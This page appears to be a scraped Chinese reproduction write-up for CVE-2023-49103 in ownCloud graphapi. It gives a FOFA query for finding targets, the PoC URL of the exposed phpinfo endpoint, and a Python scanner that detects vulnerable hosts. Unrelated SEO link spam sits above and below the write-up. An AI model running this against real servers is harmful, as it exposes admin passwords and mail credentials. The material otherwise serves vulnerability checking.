当前位置: 首页 > news >正文

建小说网站需要多少钱淘宝搜索指数

建小说网站需要多少钱,淘宝搜索指数,网站可不可以做自己的专利,东莞网站建设怎么做漏洞简介 ownCloud owncloud/graphapi 0.2.x在0.2.1之前和0.3.x在0.3.1之前存在漏洞。graphapi应用程序依赖于提供URL的第三方GetPhpInfo.php库。当访问此URL时,会显示PHP环境的配置详细信息(phpinfo)。此信息包括Web服务器的所有环境变量&a…

漏洞简介

ownCloud owncloud/graphapi 0.2.x在0.2.1之前和0.3.x在0.3.1之前存在漏洞。graphapi应用程序依赖于提供URL的第三方GetPhpInfo.php库。当访问此URL时,会显示PHP环境的配置详细信息(phpinfo)。此信息包括Web服务器的所有环境变量,包括敏感数据,如ownCloud管理员密码、邮件服务器凭据和许可证密钥。

漏洞等级高危
影响版本

ownCloud/graphapi 0.2.x < 0.2.1

ownCloud/graphapi 0.3.x < 0.3.1

漏洞类型信息泄露

产品简介    

 OwnCloud 是一个开源的私有云存储/网盘项目,OwnCloud 跨平台支持 Windows、Mac、Android、iOS、Linux 等平台,而且还提供了「网页版」以及 WebDAV 形式访问,因此你几乎可以在任何电脑、手机设备上都能轻松获取和访问你的文件文档,从而实现跨平台跨设备文件同步、共享、版本控制、团队协作等功能。

网络测绘

FOFA:app="ownCloud"

漏洞复现

手动验证POC

ip:port/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php
 

注意:当url存在/owncloud/时,poc需要将该路径保留

即POC为

ip:port/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php
python扫描验证脚本
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
"""
@Project :漏洞复现POC 
@File    :【CVE-2023-49103】ownCloud graphapi信息泄露漏洞.py
@Author  :星之尘
@Date    :2023/11/28 15:24 
@脚本说明:
"""
import requests
from requests import Timeout
from urllib3.exceptions import InsecureRequestWarning
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}def verification(url):requests.packages.urllib3.disable_warnings(InsecureRequestWarning)if not url.startswith('http://') and not url.startswith('https://'):url = 'http://' + urlpath1 = "/index.php/login"path2 = "/owncloud/index.php/login"encodetext1 = url + path1encodetext2 = url + path2finger_url = [encodetext2, encodetext1]for url in finger_url:req1 = requests.get(url, headers=headers, verify=False, timeout=20)if "ownCloud" in req1.text:return urlreturn False
def scan():verification_url = verification(url)print(f"扫描目标: {verification_url}")print("---------------------------------------------------")try:if "owncloud" in verification_url:exp_path = "/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php"else:exp_path = "/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php"exp=url + exp_pathrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)req2 = requests.post(exp, headers=headers, verify=False, timeout=20)if req2.status_code == 200 and "phpinfo()" in req2.text:print(f"[+] {url} !!!存在【CVE-2023-49103】ownCloud graphapi信息泄露漏洞!!!;")else:print(f"[-] {url} 不存在【CVE-2023-49103】ownCloud graphapi信息泄露漏洞")except Timeout:print(f"[!] 请求超时,跳过URL: {url}", "yellow")except Exception as e:if 'HTTPSConnectionPool' in str(e) or 'Burp Suite Professional' in str(e):print(f"[-] {url} 证书校验错误或者证书被拒绝")else:print(str(e))if __name__ == "__main__":url = "your ip:port"verification(url)scan()

http://www.ds6.com.cn/news/2840.html

相关文章:

  • 信用平台网站建设建议域名查询网站入口
  • 装修设计费收费标准2020站长之家seo查询
  • 用axure做网站原型图杭州网站
  • 网站的站外推广手段seo引擎搜索网址
  • 景安网络网站建设网络营销百科
  • 织梦微信网站模板推广赚钱平台
  • 深圳平台型网站建设公司网络品牌营销
  • 网站建设 域名 管理网络优化工程师有前途吗
  • 做直播网站需要什么商丘网络推广公司
  • 重庆网站搭建公司今天宣布疫情最新消息
  • 网站开发的wbs分解图外贸网站平台都有哪些 免费的
  • 自己的服务器如何做网站我想做地推怎么找渠道
  • 视频网站的服务器建设站长统计app软件下载
  • 做房地产要自己开网站网站怎么才能被百度收录
  • 新塘 网站建设合肥网络关键词排名
  • 响应式网站无法做联盟广告百度平台联系方式
  • 网站不足西安搜索引擎优化
  • 网站做任务给钱的中国十大软件外包公司
  • 合肥龙岗医院网站建设领硕网站seo优化
  • php做网站首页的代码商务软文写作300
  • bootstrap公司网站模板360上网安全导航
  • 如何阿里巴巴网站做推广方案全媒体运营师培训
  • 橙子建站链接谷歌推广代理商
  • 网站建设技术标准竞价销售是什么意思
  • 天津网站建设企业系统打开百度官网
  • 建设银行申请信用卡网站湖南seo网站开发
  • 怎么给网站在百度地图上做爬虫如何在百度发布信息
  • 喜欢做网站全网营销推广平台
  • 深圳网站建设东营怎么宣传自己新开的店铺
  • 西宁网络公司网站建设域名注册万网